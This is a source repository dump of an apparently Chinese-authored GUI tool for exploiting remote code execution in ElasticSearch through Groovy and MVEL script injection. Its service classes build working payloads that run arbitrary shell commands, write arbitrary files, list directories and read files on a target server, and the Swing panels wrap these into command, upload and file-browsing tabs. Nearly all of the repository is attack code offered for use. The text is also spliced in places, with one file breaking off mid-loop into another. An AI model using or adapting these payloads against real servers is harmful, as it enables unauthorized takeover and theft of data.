├── README.md ├── esExploit.jar └── src └── org └── vti ├── enumeration └── Version.java ├── main └── AppMain.java ├── service ├── MyService.java └── impl │ ├── ESGroovyServiceImpl.java │ └── ESMvelServiceImp.java ├── ui ├── CmdPanel.java ├── FileViewPanel.java ├── MainPanel.java └── UploadPanel.java └── util └── RequestUtil.java /README.md: -------------------------------------------------------------------------------- 1 | # master 2 | 3 | ElasticSearch Remote Code Execution! 4 | 5 | There is Java Code Exploit. 6 | -------------------------------------------------------------------------------- /esExploit.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Svti/ElasticSearchEXP/ac4047af6cdb25bc6d7302af4a07020e927a9c91/esExploit.jar -------------------------------------------------------------------------------- /src/org/vti/enumeration/Version.java: -------------------------------------------------------------------------------- 1 | package org.vti.enumeration; 2 | 3 | public enum Version { 4 | Groovy , MVEL , 5 | } 6 | -------------------------------------------------------------------------------- /src/org/vti/main/AppMain.java: -------------------------------------------------------------------------------- 1 | package org.vti.main; 2 | 3 | import javax.swing.UIManager; 4 | 5 | import org.vti.ui.MainPanel; 6 | 7 | public class AppMain { 8 | 9 | public static void main(String[] args) { 10 | try { 11 | UIManager.setLookAndFeel("com.sun.java.swing.plaf.nimbus.NimbusLookAndFeel"); 12 | new MainPanel(); 13 | } catch (Exception e) { 14 | e.printStackTrace(); 15 | } 16 | } 17 | } 18 | -------------------------------------------------------------------------------- /src/org/vti/service/MyService.java: -------------------------------------------------------------------------------- 1 | package org.vti.service; 2 | 3 | import java.util.List; 4 | 5 | public interface MyService { 6 | 7 | public String doExecuteCMD (String host,String param) throws Exception; 8 | 9 | public boolean doUpload (String host,String path,String content) throws Exception; 10 | 11 | public List listRoots(String host) throws Exception; 12 | 13 | public List getFiles(String host,String path) throws Exception; 14 | 15 | public boolean isDirectory (String host,String path) throws Exception; 16 | 17 | public String getFileContent (String host,String path) throws Exception; 18 | 19 | } 20 | -------------------------------------------------------------------------------- /src/org/vti/service/impl/ESGroovyServiceImpl.java: -------------------------------------------------------------------------------- 1 | package org.vti.service.impl; 2 | 3 | import java.util.ArrayList; 4 | import java.util.List; 5 | 6 | import org.vti.service.MyService; 7 | import org.vti.util.RequestUtil; 8 | 9 | import com.google.gson.JsonArray; 10 | import com.google.gson.JsonObject; 11 | import com.google.gson.JsonParser; 12 | 13 | public class ESGroovyServiceImpl implements MyService{ 14 | 15 | public String doExecuteCMD (String host, String param) throws Exception{ 16 | 17 | String cmdUrl= "{\"size\":1,\"script_fields\": {\"exp\": {\"script\"" + 18 | ":\"java.lang.Math.class.forName(\\\"java.io.BufferedReader\\\")" + 19 | ".getConstructor(java.io.Reader.class)" + 20 | ".newInstance(java.lang.Math.class.forName(\\\"java.io.InputStreamReader\\\")" + 21 | ".getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class" + 22 | ".forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\""+param+"\\\")" + 23 | ".getInputStream())).readLines()\",\"lang\": \"groovy\"}}}"; 24 | 25 | String result= new RequestUtil().doPostRequest(host+"/_search?pretty",cmdUrl); 26 | JsonObject object= new JsonParser().parse(result).getAsJsonObject(); 27 | JsonObject hits= object.getAsJsonObject("hits").getAsJsonArray("hits").get(0).getAsJsonObject(); 28 | JsonObject fields=hits.getAsJsonObject("fields"); 29 | 30 | JsonArray array=fields.get("exp").getAsJsonArray().get(0).getAsJsonArray(); 31 | 32 | String str=""; 33 | 34 | for (int i = 0; i < array.size(); i++) { 35 | str+=array.get(i).getAsString()+"\n"; 36 | } 37 | 38 | return str; 39 | } 40 | 41 | @Override 42 | public boolean doUpload(String host, String path, String content) 43 | throws Exception { 44 | 45 | String cmdUrl= "{\"size\":1,\"script_fields\": {\"exp\": {\"script\"" + 46 | ":\"java.lang.Math.class.forName(\\\"java.io.FileOutputStream\\\")" + 47 | ".getConstructor(java.io.File.class)" + 48 | ".newInstance(java.lang.Math.class.forName(\\\"java.io.File\\\")" + 49 | ".getConstructor(java.lang.String.class)" + 50 | ".newInstance(\\\""+ path +"\\\"))" + 51 | ".write(java.lang.Math.class.forName(\\\"java.lang.String\\\")" + 52 | ".getConstructor(java.lang.String.class).newInstance(\\\""+content+"\\\").getBytes())\"," + 53 | "\"lang\": \"groovy\"}}}"; 54 | 55 | 56 | String result= new RequestUtil().doPostRequest(host+"/_search?pretty",cmdUrl); 57 | 58 | JsonObject object= new JsonParser().parse(result).getAsJsonObject(); 59 | JsonObject hits= object.getAsJsonObject("hits").getAsJsonArray("hits").get(0).getAsJsonObject(); 60 | JsonObject fields=hits.getAsJsonObject("fields"); 61 | 62 | String echo=fields.get("exp").getAsJsonArray().get(0).toString(); 63 | 64 | if (echo.equals("null")) { 65 | return true; 66 | }else { 67 | return false; 68 | } 69 | } 70 | 71 | @Override 72 | public List listRoots(String host) throws Exception{ 73 | 74 | String cmdUrl= "{\"size\":1,\"script_fields\": {\"exp\": {\"script\"" + 75 | ":\"java.lang.Math.class.forName(\\\"java.io.File\\\")" + 76 | ".listRoots()\",\"lang\": \"groovy\"}}}"; 77 | 78 | String result= new RequestUtil().doPostRequest(host+"/_search?pretty",cmdUrl); 79 | 80 | JsonObject object= new JsonParser().parse(result).getAsJsonObject(); 81 | JsonObject hits= object.getAsJsonObject("hits").getAsJsonArray("hits").get(0).getAsJsonObject(); 82 | JsonObject fields=hits.getAsJsonObject("fields"); 83 | 84 | JsonArray array=fields.get("exp").getAsJsonArray().get(0).getAsJsonArray(); 85 | 86 | List list= new ArrayList<>(); 87 | 88 | for (int i = 0; i < array.size(); i++) { 89 | list.add(array.getAsString()); 90 | } 91 | return list; 92 | } 93 | 94 | @Override 95 | public List getFiles(String host, String path) throws Exception { 96 | 97 | String cmdUrl= "{\"size\":1,\"script_fields\": {\"exp\": {\"script\"" + 98 | ":\"java.lang.Math.class.forName(\\\"java.io.File\\\")" + 99 | ".getConstructor(java.lang.String.class)" + 100 | ".newInstance(\\\""+ path +"\\\").list()\",\"lang\": \"groovy\"}}}"; 101 | 102 | String result= new RequestUtil().doPostRequest(host+"/_search?pretty",cmdUrl); 103 | 104 | JsonObject object= new JsonParser().parse(result).getAsJsonObject(); 105 | JsonObject hits= object.getAsJsonObject("hits").getAsJsonArray("hits").get(0).getAsJsonObject(); 106 | JsonObject fields=hits.getAsJsonObject("fields"); 107 | 108 | JsonArray array=fields.get("exp").getAsJsonArray().get(0).getAsJsonArray(); 109 | 110 | if (array.size()>0) { 111 | List list= new ArrayList<>(); 112 | 113 | for (int i = 0; i < array.size(); i++) { 114 | list.add(array.get(i).getAsString()); 115 | } 116 | return list; 117 | }else { 118 | return null; 119 | } 120 | } 121 | 122 | @Override 123 | public boolean isDirectory(String host, String path) throws Exception { 124 | 125 | String cmdUrl= "{\"size\":1,\"script_fields\": {\"exp\": {\"script\"" + 126 | ":\"java.lang.Math.class.forName(\\\"java.io.File\\\")" + 127 | ".getConstructor(java.lang.String.class)" + 128 | ".newInstance(\\\""+ path +"\\\").isDirectory()\",\"lang\": \"groovy\"}}}"; 129 | 130 | String result= new RequestUtil().doPostRequest(host+"/_search?pretty",cmdUrl); 131 | 132 | JsonObject object= new JsonParser().parse(result).getAsJsonObject(); 133 | JsonObject hits= object.getAsJsonObject("hits").getAsJsonArray("hits").get(0).getAsJsonObject(); 134 | JsonObject fields=hits.getAsJsonObject("fields"); 135 | 136 | boolean flag= fields.get("exp").getAsJsonArray().get(0).getAsBoolean(); 137 | 138 | return flag; 139 | 140 | } 141 | 142 | @Override 143 | public String getFileContent(String host, String path) throws Exception { 144 | 145 | String cmdUrl= "{\"size\":1,\"script_fields\": {\"exp\": {\"script\"" + 146 | ":\"java.lang.Math.class.forName(\\\"java.io.BufferedReader\\\")" + 147 | ".getConstructor(java.io.Reader.class)" + 148 | ".newInstance(java.lang.Math.class.forName(\\\"java.io.InputStreamReader\\\")" + 149 | ".getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class" + 150 | ".forName(\\\"java.io.FileInputStream\\\").getConstructor(java.lang.String.class)" + 151 | ".newInstance(\\\""+ path +"\\\")" + 152 | ")).readLines()\",\"lang\": \"groovy\"}}}"; 153 | 154 | String result= new RequestUtil().doPostRequest(host+"/_search?pretty",cmdUrl); 155 | JsonObject object= new JsonParser().parse(result).getAsJsonObject(); 156 | JsonObject hits= object.getAsJsonObject("hits").getAsJsonArray("hits").get(0).getAsJsonObject(); 157 | JsonObject fields=hits.getAsJsonObject("fields"); 158 | 159 | JsonArray array=fields.get("exp").getAsJsonArray().get(0).getAsJsonArray(); 160 | 161 | String text=""; 162 | 163 | for (int i = 0; i < array.size(); i++) { 164 | text+=array.get(i).getAsString()+"\n"; 165 | } 166 | 167 | return text; 168 | 169 | } 170 | 171 | } 172 | -------------------------------------------------------------------------------- /src/org/vti/service/impl/ESMvelServiceImp.java: -------------------------------------------------------------------------------- 1 | package org.vti.service.impl; 2 | 3 | import java.net.URLEncoder; 4 | import java.util.ArrayList; 5 | import java.util.List; 6 | 7 | import org.vti.service.MyService; 8 | import org.vti.util.RequestUtil; 9 | 10 | import com.google.gson.JsonObject; 11 | import com.google.gson.JsonParser; 12 | 13 | public class ESMvelServiceImp implements MyService{ 14 | 15 | @Override 16 | public String doExecuteCMD(String host, String param) throws Exception { 17 | 18 | String cmdUrl= "/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}}," + 19 | "%22script_fields%22:{%22exp%22:{%22script%22:%22import%20java.util.*;\\nimport%20java.io.*;\\nString%20str%20=%20\\%22\\%22;" + 20 | "BufferedReader%20br%20=%20new%20BufferedReader(new%20InputStreamReader(Runtime.getRuntime().exec(\\%22" + URLEncoder.encode(param, "UTF-8") + "\\%22).getInputStream()));" + 21 | "StringBuilder%20sb%20=%20new%20StringBuilder();while((str=br.readLine())!=null){sb.append(str%2b%5C%22%5Cr%5Cn%5C%22);}sb.toString();%22}}}"; 22 | 23 | String result= new RequestUtil().doGetRequest(host+"/"+cmdUrl); 24 | JsonObject object= new JsonParser().parse(result).getAsJsonObject(); 25 | JsonObject hits= object.getAsJsonObject("hits").getAsJsonArray("hits").get(0).getAsJsonObject(); 26 | JsonObject fields=hits.getAsJsonObject("fields"); 27 | 28 | return fields.get("exp").getAsString(); 29 | } 30 | 31 | @Override 32 | public boolean doUpload(String host, String path, String content) 33 | throws Exception { 34 | 35 | System.out.println(content); 36 | 37 | String cmdUrl="/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}}," + 38 | "%22script_fields%22:{%22exp%22:{%22script%22:%22import%20java.util.*;" + 39 | "\\nimport%20java.io.*;\\nFile%20f%20=%20new%20File(%5C%22" + URLEncoder.encode(path.replaceAll("\\\\", "/").replaceAll("/+", "/"),"UTF-8") + "%5C%22);" + 40 | "if(f.exists()){%5C%22exists%5C%22.toString();}" + 41 | "BufferedWriter%20bw%20=%20new%20BufferedWriter(new%20OutputStreamWriter(" + 42 | "new%20FileOutputStream(f),%5C%22UTF-8%5C%22));bw.write(%5C%22" + URLEncoder.encode(content,"UTF-8") + "%5C%22);" + 43 | "bw.flush();bw.close();if(f.exists()){%5C%22success%5C%22.toString();}%22}}}"; 44 | String result= new RequestUtil().doGetRequest(host+"/"+cmdUrl); 45 | JsonObject object= new JsonParser().parse(result).getAsJsonObject(); 46 | JsonObject hits= object.getAsJsonObject("hits").getAsJsonArray("hits").get(0).getAsJsonObject(); 47 | JsonObject fields=hits.getAsJsonObject("fields"); 48 | 49 | System.out.println(fields); 50 | 51 | String echo= fields.get("exp").getAsString(); 52 | 53 | if (echo.equals("success")) { 54 | return true; 55 | }else { 56 | return false; 57 | } 58 | } 59 | 60 | @Override 61 | public List listRoots(String host) throws Exception{ 62 | 63 | String cmdUrl= "/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}}," + 64 | "%22script_fields%22:{%22exp%22:{%22script%22:%22import%20java.util.*;\\nimport%20java.io.*;\\nString%20str%20=%20\\%22\\%22;" + 65 | "File%20[]%20files%20=File.listRoots();" + 66 | "StringBuilder%20sb%20=%20new%20StringBuilder();" + 67 | "for(File%20file:files){str=file.getPath();sb.append(str%2b%5C%22%5Cr%5Cn%5C%22);}sb.toString();%22}}}"; 68 | String result= new RequestUtil().doGetRequest(host+"/"+cmdUrl); 69 | JsonObject object= new JsonParser().parse(result).getAsJsonObject(); 70 | JsonObject hits= object.getAsJsonObject("hits").getAsJsonArray("hits").get(0).getAsJsonObject(); 71 | JsonObject fields=hits.getAsJsonObject("fields"); 72 | 73 | String roots= fields.get("exp").getAsString(); 74 | 75 | String array[]=roots.split("\n"); 76 | 77 | List distList=new ArrayList(); 78 | 79 | for (int i = 0; i < array.length; i++) { 80 | distList.add(array[i]); 81 | } 82 | 83 | return distList; 84 | 85 | } 86 | 87 | @Override 88 | public List getFiles(String host, String path) throws Exception { 89 | 90 | String cmdUrl= "/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}}," + 91 | "%22script_fields%22:{%22exp%22:{%22script%22:%22import%20java.util.*;\\nimport%20java.io.*;\\nString%20str%20=%20\\%22\\%22;" + 92 | "File%20[]%20files%20=new%20File(%20\\%22"+path+"\\%22).listFiles();" + 93 | "StringBuilder%20sb%20=%20new%20StringBuilder();" + 94 | "for(File%20file:files){str=file.getName();sb.append(str%2b%5C%22%5Cr%5Cn%5C%22);}sb.toString();%22}}}"; 95 | 96 | String result= new RequestUtil().doGetRequest(host+"/"+cmdUrl); 97 | JsonObject object= new JsonParser().parse(result).getAsJsonObject(); 98 | JsonObject hits= object.getAsJsonObject("hits").getAsJsonArray("hits").get(0).getAsJsonObject(); 99 | JsonObject fields=hits.getAsJsonObject("fields"); 100 | String text= fields.get("exp").getAsString(); 101 | 102 | String arrays[]=text.split("\n"); 103 | 104 | if (arrays.length>0) { 105 | 106 | ListfileList=new ArrayList(); 107 | 108 | for (int i = 0; i < arrays.length; i++) { 109 | fileList.add(arrays[i]); 110 | } 111 | 112 | return fileList; 113 | }else { 114 | return null; 115 | } 116 | 117 | } 118 | 119 | @Override 120 | public boolean isDirectory(String host, String path) throws Exception { 121 | 122 | String cmdUrl= "/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}}," + 123 | "%22script_fields%22:{%22exp%22:{%22script%22:%22import%20java.util.*;\\nimport%20java.io.*;" + 124 | "File%20file%20=new%20File(%20\\%22"+path+"\\%22);" + 125 | "file.isDirectory();%22}}}"; 126 | 127 | String result= new RequestUtil().doGetRequest(host+"/"+cmdUrl); 128 | JsonObject object= new JsonParser().parse(result).getAsJsonObject(); 129 | JsonObject hits= object.getAsJsonObject("hits").getAsJsonArray("hits").get(0).getAsJsonObject(); 130 | JsonObject fields=hits.getAsJsonObject("fields"); 131 | boolean flag= fields.get("exp").getAsBoolean(); 132 | 133 | return flag; 134 | } 135 | 136 | @Override 137 | public String getFileContent(String host, String path) throws Exception { 138 | 139 | String cmdUrl= "/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}}," + 140 | "%22script_fields%22:{%22exp%22:{%22script%22:%22import%20java.util.*;\\nimport%20java.io.*;\\nString%20str%20=%20\\%22\\%22;" + 141 | "InputStream%20inputStream%20=%20new%20FileInputStream(new%20File(%20\\%22"+path+"\\%22));" + 142 | "StringBuilder%20sb=%20new%20StringBuilder();int%20m=0;while((m=inputStream.read())!=-1)" + 143 | "{str=Integer.toHexString(m);sb.append(str);}sb.toString();%22}}}"; 144 | String result= new RequestUtil().doGetRequest(host+"/"+cmdUrl); 145 | JsonObject object= new JsonParser().parse(result).getAsJsonObject(); 146 | JsonObject hits= object.getAsJsonObject("hits").getAsJsonArray("hits").get(0).getAsJsonObject(); 147 | JsonObject fields=hits.getAsJsonObject("fields"); 148 | String content= fields.get("exp").getAsString(); 149 | 150 | String viewText=""; 151 | String h = "0123456789abcdef"; 152 | for (int i = 0; i 0) { 120 | textPane.setText("请稍候..."); 121 | 122 | MyService service=null; 123 | 124 | if (version.equals(Version.Groovy)) { 125 | service=new ESGroovyServiceImpl(); 126 | }else { 127 | service=new ESMvelServiceImp(); 128 | } 129 | 130 | textPane.setText(service.doExecuteCMD(host, command)); 131 | 132 | }else { 133 | JOptionPane.showMessageDialog(this, "请输入执行命令"); 134 | } 135 | } catch (Exception exp) { 136 | textPane.setText(exp.getMessage()); 137 | } 138 | } 139 | 140 | public void setReqestUrl(String host){ 141 | this.host=host; 142 | } 143 | 144 | public void setVersion(Version version){ 145 | this.version=version; 146 | } 147 | } 148 | -------------------------------------------------------------------------------- /src/org/vti/ui/FileViewPanel.java: -------------------------------------------------------------------------------- 1 | package org.vti.ui; 2 | 3 | import java.awt.event.ActionEvent; 4 | import java.awt.event.ActionListener; 5 | import java.awt.event.MouseAdapter; 6 | import java.awt.event.MouseEvent; 7 | import java.io.File; 8 | import java.io.FileOutputStream; 9 | import java.util.List; 10 | 11 | import javax.swing.JFileChooser; 12 | import javax.swing.JMenuItem; 13 | import javax.swing.JOptionPane; 14 | import javax.swing.JPanel; 15 | import javax.swing.GroupLayout; 16 | import javax.swing.JPopupMenu; 17 | import javax.swing.JScrollPane; 18 | import javax.swing.JTabbedPane; 19 | import javax.swing.JTextPane; 20 | import javax.swing.JTree; 21 | import javax.swing.GroupLayout.Alignment; 22 | import javax.swing.JSplitPane; 23 | import javax.swing.tree.DefaultMutableTreeNode; 24 | import javax.swing.tree.DefaultTreeModel; 25 | 26 | import org.vti.enumeration.Version; 27 | import org.vti.service.MyService; 28 | import org.vti.service.impl.ESGroovyServiceImpl; 29 | import org.vti.service.impl.ESMvelServiceImp; 30 | 31 | public class FileViewPanel extends JPanel{ 32 | 33 | private static final long serialVersionUID = 1L; 34 | 35 | private DefaultMutableTreeNode root=new DefaultMutableTreeNode("我的电脑"); 36 | 37 | private JTree tree; 38 | 39 | private JTabbedPane fileContentJTabbedPane; 40 | 41 | private JTextPane fileContentJTextPane; 42 | 43 | private JPopupMenu rightJPopupMenu; 44 | 45 | private JFileChooser filesaveChooser; 46 | 47 | private String host; 48 | 49 | private Version version; 50 | 51 | public FileViewPanel(){ 52 | setSize(600,460); 53 | setVisible(true); 54 | 55 | JSplitPane splitPane = new JSplitPane(); 56 | splitPane.setDividerLocation(160); 57 | 58 | tree=new JTree(root); 59 | 60 | JScrollPane fileJtreeJScrollPane=new JScrollPane(tree); 61 | 62 | fileContentJTabbedPane=new JTabbedPane(); 63 | 64 | this.fileContentJTabbedPane.addMouseListener(new MouseAdapter() { 65 | public void mouseClicked(MouseEvent e) { 66 | if ((e.getClickCount() == 2)&&(FileViewPanel.this.fileContentJTabbedPane.getTabCount()> 0)) { 67 | FileViewPanel.this.fileContentJTabbedPane.remove(FileViewPanel.this.fileContentJTabbedPane.getSelectedIndex()); 68 | } 69 | } 70 | }); 71 | 72 | tree.addMouseListener(new MouseAdapter() { 73 | 74 | @Override 75 | public void mouseClicked(MouseEvent e) { 76 | 77 | if (tree.getSelectionCount() != 0 && e.getButton() == 1 && e.getClickCount() == 2) { 78 | 79 | if (tree.getSelectionPath().toString().equals("[我的电脑]")) { 80 | 81 | new Thread(new Runnable() { 82 | @Override 83 | public void run() { 84 | getRoots(); 85 | } 86 | }).start(); 87 | 88 | }else { 89 | 90 | new Thread(new Runnable() { 91 | @Override 92 | public void run() { 93 | 94 | String path = ""; 95 | String longText = tree.getSelectionPath().toString(); 96 | String[] text = longText.substring(1, longText.length() - 1).split(","); 97 | for (int k = 0; k < text.length; k++) { 98 | path = path + text[k].trim() + "/"; 99 | } 100 | path = path.substring(4, path.length()); 101 | String rquestPath = path.replaceAll("\\\\", "/"); 102 | 103 | DefaultMutableTreeNode selectedNode = (DefaultMutableTreeNode)tree.getLastSelectedPathComponent(); 104 | 105 | if(isDirectory(rquestPath)){ 106 | List fileNames= getFiles(rquestPath); 107 | 108 | selectedNode.removeAllChildren(); 109 | for (String fileName:fileNames) { 110 | selectedNode.add(new DefaultMutableTreeNode(fileName)); 111 | } 112 | 113 | tree.repaint(); 114 | }else { 115 | String fileName = selectedNode.toString(); 116 | String content = getFileContent(rquestPath); 117 | fileContentJTextPane = new JTextPane(); 118 | fileContentJTextPane.setEditable(false); 119 | fileContentJTextPane.setText(content); 120 | fileContentJTextPane.setCaretPosition(0); 121 | fileContentJTabbedPane.addTab(fileName,fileContentJTextPane); 122 | } 123 | 124 | 125 | } 126 | }).start(); 127 | 128 | } 129 | 130 | } 131 | 132 | if (tree.getSelectionCount() != 0 && e.getButton() == 3) { 133 | rightJPopupMenu = new JPopupMenu(); 134 | 135 | final JMenuItem download = new JMenuItem("下载"); 136 | download.addActionListener(new ActionListener() { 137 | @Override 138 | public void actionPerformed(ActionEvent e) { 139 | if (e.getSource()==download) { 140 | 141 | String path = ""; 142 | String longText = tree.getSelectionPath().toString(); 143 | String[] text = longText.substring(1, longText.length() - 1).split(","); 144 | for (int k = 0; k < text.length; k++) { 145 | path = path + text[k].trim() + "/"; 146 | } 147 | path = path.substring(4, path.length()); 148 | final String rquestPath = path.replaceAll("\\\\", "/"); 149 | 150 | new Thread(new Runnable() { 151 | 152 | @Override 153 | public void run() { 154 | 155 | if(!isDirectory(rquestPath)){ 156 | filesaveChooser = new JFileChooser(); 157 | int option =filesaveChooser.showSaveDialog(null); 158 | 159 | if (option == JFileChooser.APPROVE_OPTION) { 160 | File file = filesaveChooser.getSelectedFile(); 161 | try { 162 | FileOutputStream fos=new FileOutputStream(file); 163 | String content=getFileContent(rquestPath); 164 | fos.write(content.getBytes()); 165 | fos.flush(); 166 | fos.close(); 167 | JOptionPane.showMessageDialog(null, "恭喜你，下载成功"); 168 | } catch (Exception exp) { 169 | exp.printStackTrace(); 170 | JOptionPane.showMessageDialog(null, "对不起,下载失败"); 171 | } 172 | } 173 | } 174 | } 175 | }).start(); 176 | 177 | } 178 | } 179 | }); 180 | 181 | 182 | final JMenuItem refresh = new JMenuItem("刷新"); 183 | refresh.addActionListener(new ActionListener() { 184 | @Override 185 | public void actionPerformed(ActionEvent e) { 186 | if (e.getSource()==refresh) { 187 | 188 | new Thread(new Runnable() { 189 | 190 | @Override 191 | public void run() { 192 | 193 | String path = ""; 194 | String longText = tree.getSelectionPath().toString(); 195 | String[] text = longText.substring(1, longText.length() - 1).split(","); 196 | for (int k = 0; k < text.length; k++) { 197 | path = path + text[k].trim() + "/"; 198 | } 199 | path = path.substring(4, path.length()); 200 | String rquestPath = path.replaceAll("\\\\", "/"); 201 | 202 | if(isDirectory(rquestPath)){ 203 | DefaultMutableTreeNode selectedNode = (DefaultMutableTreeNode)tree.getLastSelectedPathComponent(); 204 | 205 | List fileNames= getFiles(rquestPath); 206 | 207 | selectedNode.removeAllChildren(); 208 | for (String fileName:fileNames) { 209 | selectedNode.add(new DefaultMutableTreeNode(fileName)); 210 | } 211 | 212 | SwingUtilities.invokeLater(new Runnable(){ 213 | public void run() { 214 | tree.repaint(); 215 | tree.updateUI(); 216 | } 217 | }; 218 | 219 | } 220 | 221 | } 222 | }).start(); 223 | 224 | } 225 | } 226 | }); 227 | 228 | rightJPopupMenu.add(download); 229 | rightJPopupMenu.add(refresh); 230 | rightJPopupMenu.show(tree, e.getX(), e.getY()); 231 | } 232 | } 233 | 234 | }); 235 | 236 | JScrollPane fileContentJScrollPane=new JScrollPane(fileContentJTabbedPane); 237 | 238 | splitPane.setLeftComponent(fileJtreeJScrollPane); 239 | 240 | splitPane.setRightComponent(fileContentJScrollPane); 241 | 242 | GroupLayout groupLayout = new GroupLayout(this); 243 | groupLayout.setHorizontalGroup( 244 | groupLayout.createParallelGroup(Alignment.LEADING) 245 | .addComponent(splitPane, GroupLayout.DEFAULT_SIZE, 600, Short.MAX_VALUE) 246 | ); 247 | groupLayout.setVerticalGroup( 248 | groupLayout.createParallelGroup(Alignment.LEADING) 249 | .addComponent(splitPane, GroupLayout.DEFAULT_SIZE, 460, Short.MAX_VALUE) 250 | ); 251 | 252 | setLayout(groupLayout); 253 | } 254 | 255 | 256 | public void setReqestUrl(String host){ 257 | this.host=host; 258 | } 259 | 260 | public void setVersion(Version version){ 261 | this.version=version; 262 | } 263 | 264 | private void getRoots(){ 265 | try { 266 | root.removeAllChildren(); 267 | if (host!=null) { 268 | 269 | MyService service=null; 270 | 271 | if (version.equals(Version.Groovy)) { 272 | service=new ESGroovyServiceImpl(); 273 | }else { 274 | service=new ESMvelServiceImp(); 275 | } 276 | 277 | ListdiskList=service.listRoots(host); 278 | 279 | DefaultTreeModel defaultTreeModel = null; 280 | 281 | for (String disk:diskList) { 282 | DefaultMutableTreeNode child = new DefaultMutableTreeNode(disk); 283 | root.add(child); 284 | } 285 | defaultTreeModel = new DefaultTreeModel(this.root); 286 | tree.setModel(defaultTreeModel); 287 | tree.repaint(); 288 | 289 | }else { 290 | JOptionPane.showMessageDialog(this, "请输入URL"); 291 | } 292 | } catch (Exception exp) { 293 | exp.printStackTrace(); 294 | JOptionPane.showMessageDialog(this, "对不起,无法获取文件系统"); 295 | } 296 | } 297 | 298 | 299 | private List getFiles(String path){ 300 | 301 | try { 302 | if (host!=null) { 303 | 304 | MyService service=null; 305 | 306 | if (version.equals(Version.Groovy)) { 307 | service=new ESGroovyServiceImpl(); 308 | }else { 309 | service=new ESMvelServiceImp(); 310 | } 311 | 312 | ListfileList=service.getFiles(host, path); 313 | 314 | return fileList; 315 | 316 | }else { 317 | JOptionPane.showMessageDialog(this, "请输入URL"); 318 | return null; 319 | } 320 | } catch (Exception exp) { 321 | exp.printStackTrace(); 322 | JOptionPane.showMessageDialog(this, "对不起,无法获取文件系统"); 323 | return null; 324 | } 325 | } 326 | 327 | 328 | 329 | private boolean isDirectory(String path){ 330 | try { 331 | if (host!=null) { 332 | 333 | MyService service=null; 334 | 335 | if (version.equals(Version.Groovy)) { 336 | service=new ESGroovyServiceImpl(); 337 | }else { 338 | service=new ESMvelServiceImp(); 339 | } 340 | 341 | boolean flag=service.isDirectory(host, path); 342 | 343 | return flag; 344 | }else { 345 | JOptionPane.showMessageDialog(this, "请输入URL"); 346 | return false; 347 | } 348 | } catch (Exception exp) { 349 | exp.printStackTrace(); 350 | JOptionPane.showMessageDialog(this, "对不起,无法获取文件系统"); 351 | return false; 352 | } 353 | } 354 | 355 | private String getFileContent(String path){ 356 | try { 357 | if (host!=null) { 358 | 359 | MyService service=null; 360 | 361 | if (version.equals(Version.Groovy)) { 362 | service=new ESGroovyServiceImpl(); 363 | }else { 364 | service=new ESMvelServiceImp(); 365 | } 366 | 367 | return service.getFileContent(host, path); 368 | }else { 369 | JOptionPane.showMessageDialog(this, "请输入URL"); 370 | return ""; 371 | 372 | } 373 | } catch (Exception exp) { 374 | exp.printStackTrace(); 375 | return ""; 376 | } 377 | } 378 | } 379 | -------------------------------------------------------------------------------- /src/org/vti/ui/MainPanel.java: -------------------------------------------------------------------------------- 1 | package org.vti.ui; 2 | 3 | import java.awt.event.FocusAdapter; 4 | import java.awt.event.FocusEvent; 5 | 6 | import javax.swing.JFrame; 7 | import javax.swing.GroupLayout; 8 | import javax.swing.GroupLayout.Alignment; 9 | import javax.swing.JLabel; 10 | import javax.swing.JTextField; 11 | import javax.swing.LayoutStyle.ComponentPlacement; 12 | import javax.swing.JTabbedPane; 13 | import javax.swing.JComboBox; 14 | 15 | import org.vti.enumeration.Version; 16 | 17 | public class MainPanel extends JFrame{ 18 | 19 | private static final long serialVersionUID = 1L; 20 | private JTextField urlJTextField; 21 | private JComboBox versionJcomboBox; 22 | 23 | public MainPanel(){ 24 | setTitle("ElasticSearch 终极漏洞利用工具 Powered By VTI"); 25 | setSize(600,460); 26 | setLocationRelativeTo(null); 27 | setVisible(true); 28 | setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); 29 | 30 | JLabel urlJLabel = new JLabel("URL"); 31 | 32 | urlJTextField = new JTextField("http://127.0.0.1:9200/"); 33 | urlJTextField.setColumns(10); 34 | 35 | String []versions=new String[]{Version.Groovy.toString(),Version.MVEL.toString()}; 36 | 37 | versionJcomboBox = new JComboBox(versions); 38 | 39 | JTabbedPane tabbedPane = new JTabbedPane(JTabbedPane.TOP); 40 | 41 | final CmdPanel cmdPanel= new CmdPanel(); 42 | 43 | final UploadPanel uploadPanel= new UploadPanel(); 44 | 45 | final FileViewPanel fileViewPanel= new FileViewPanel(); 46 | 47 | tabbedPane.add("命令执行", cmdPanel); 48 | 49 | tabbedPane.add("文件上传", uploadPanel); 50 | 51 | tabbedPane.add("文件浏览", fileViewPanel); 52 | 53 | urlJTextField.addFocusListener(new FocusAdapter() { 54 | @Override 55 | public void focusLost(FocusEvent e) { 56 | super.focusLost(e); 57 | 58 | cmdPanel.setReqestUrl(urlJTextField.getText().trim()); 59 | cmdPanel.setVersion(Version.valueOf(versionJcomboBox.getSelectedItem().toString())); 60 | 61 | uploadPanel.setReqestUrl(urlJTextField.getText().trim()); 62 | uploadPanel.setVersion(Version.valueOf(versionJcomboBox.getSelectedItem().toString())); 63 | 64 | fileViewPanel.setReqestUrl(urlJTextField.getText().trim()); 65 | fileViewPanel.setVersion(Version.valueOf(versionJcomboBox.getSelectedItem().toString())); 66 | 67 | } 68 | }); 69 | 70 | versionJcomboBox.addFocusListener(new FocusAdapter() { 71 | @Override 72 | public void focusLost(FocusEvent e) { 73 | super.focusLost(e); 74 | 75 | cmdPanel.setReqestUrl(urlJTextField.getText().trim()); 76 | cmdPanel.setVersion(Version.valueOf(versionJcomboBox.getSelectedItem().toString())); 77 | 78 | uploadPanel.setReqestUrl(urlJTextField.getText().trim()); 79 | uploadPanel.setVersion(Version.valueOf(versionJcomboBox.getSelectedItem().toString())); 80 | 81 | 